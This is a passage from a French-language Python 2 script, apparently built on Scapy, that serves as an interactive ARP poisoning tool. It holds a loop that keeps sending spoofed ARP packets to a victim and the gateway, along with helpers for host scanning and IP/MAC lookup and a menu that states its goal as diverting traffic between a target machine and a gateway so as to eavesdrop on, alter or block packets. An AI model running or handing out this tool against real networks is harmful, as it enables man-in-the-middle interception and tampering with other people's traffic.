152 | poison_du_gateway.pdst = ip_gateway
153 | poison_du_gateway.hwdst = mac_gateway
154 | try:
155 | while True:
156 | send(poison_du_target)
157 | send(poison_du_gateway)
158 | time.sleep(0.5)
159 |
160 | except KeyboardInterrupt:
161 | for i in range(1,4):
162 | print"..."
163 | time.sleep(0.2)
164 | print "[*] lancement de l'antidote "
165 | antidote(mac_client,ip_client,mac_gateway,ip_gateway)
166 | def menu():
167 | print " \t \t \t \t \tBenvenue"
168 | print " \n \n "
169 | print "cet outil va vous permettre de realiser l'ARP poisoning pour attaquer tout reseau local utilisant le protocole de resolution d'adresse ARP , les cas les plus repandus etant les reseaux Ethernet et Wi-Fi. Cette technique vas nous permettre par la suite de detourner des flux de communications transitant entre une machine cible et une passerelle,ensuite ecouter, modifier ou encore bloquer les paquets reseaux."
170 | print " \n \n "
171 | print " 0- voir votre table de routage et cache ARP "
172 | print " 1- trouver les live hosts ( IP/MAC ) dans une plage dans mon reseau"
173 | print " 2- trouver la correspondance IP/MAC d'un hote specifique "
174 | print " 3- lancer l'ARP poisoning"
175 | print " \n "
176 | choix=raw_input("[?] taper le numero correspondant a votre choix : ")
177 | if choix == "2" :
178 | ip_mac()
179 | if choix == "0":
180 | cache_et_route()
181 | if choix == "1":
182 | scanning()
183 | if choix == "3":
184 | arp_poisoning()
185 | def arp_poisoning():
186 | print "'\n ( (\n ) ) ( )\n ( ) ) .---.\n ) ( .-\"\"-. ( ( / \\\n ( .-\"\"-. ( ) / _ _ \\ ) ) |() ()|\n / _ _ \\ ) |(_\\/_)| .---. ( (_ 0 _)\n |(_)(_)| ( .---. (_ /\\ _) / \\ .-\"\"-. |xxx|\n (_ /\\ _) / \\ |v==v| |<\\ />| / _ _ \\ \'---\'\n |wwww| |(\\ /)|( \'-..-\' (_ A _) |/_)(_\\|\n \'-..-\' (_ o _) ) .---. |===| (_ /\\ _)\n |===| ( / \\ \'---\' |mmmm|\n \'---\' |{\\ /}| \'-..-\'\n (_ V _)\n |\"\"\"|\n \'---\'\'"
187 | print "[!] AVANT DE COMMENCER L'ATTAQUE VOUS DEVEZ CONNAITRE : \n (mac_client,ip_client,mac_gateway,ip_gateway) "
188 | ip_client = raw_input("[?] ip_client :")
189 | x,y = arping(ip_client,verbose=0)
190 | x.show()
191 | mac_client = raw_input("[?] coller ici la mac_client :")
192 |
193 | ip_gateway = raw_input("[?] ip_gateway :")
194 | x,y=arping(ip_gateway,verbose=0)
195 | x.show()
196 | mac_gateway = raw_input("[?] coller ici la mac_gateway :")
197 |
198 | poison(mac_client,ip_client,mac_gateway,ip_gateway)
199 |
200 | menu()
201 |
202 | def ip_mac():
203 |
204 | ip=raw_input("[?] donner l'adresse IP : ")
205 | x,y = arping(ip,verbose=0)
206 | x.show()
207 | choix = raw_input("[?] une autre (y/n): ")
208 | if choix.lower() == "y" :
209 | ip_mac()
210 | if choix.lower() == "n" :
211 | return menu()
212 |
213 | def cache_et_route():
214 | print " ----------------------------------------------------------- "
215 | ifconfig = subprocess.Popen('ifconfig wlan0 | grep \'inet adr\' | cut -d \":\" -f 2 | cut -d \" \" -f 1',shell=True,stdout = subprocess.PIPE)
216 | addr = ifconfig.stdout.read().strip('\n')
217 | print "[!] votre adresse IP est : " + addr
218 | print " ----------------------------------------------------------- "
219 | table = subprocess.Popen("route",shell=True,stdout=subprocess.PIPE)
220 | print table.stdout.read()
221 | print " ----------------------------------------------------------- "
222 | cache = subprocess.Popen("arp",shell=True,stdout=subprocess.PIPE)
223 | print cache.stdout.read()
224 | choix =raw_input("[!] taper sur ENTRER pour revenir au menu : ")
225 | return menu()
226 |
227 |
--------------------------------------------------------------------------------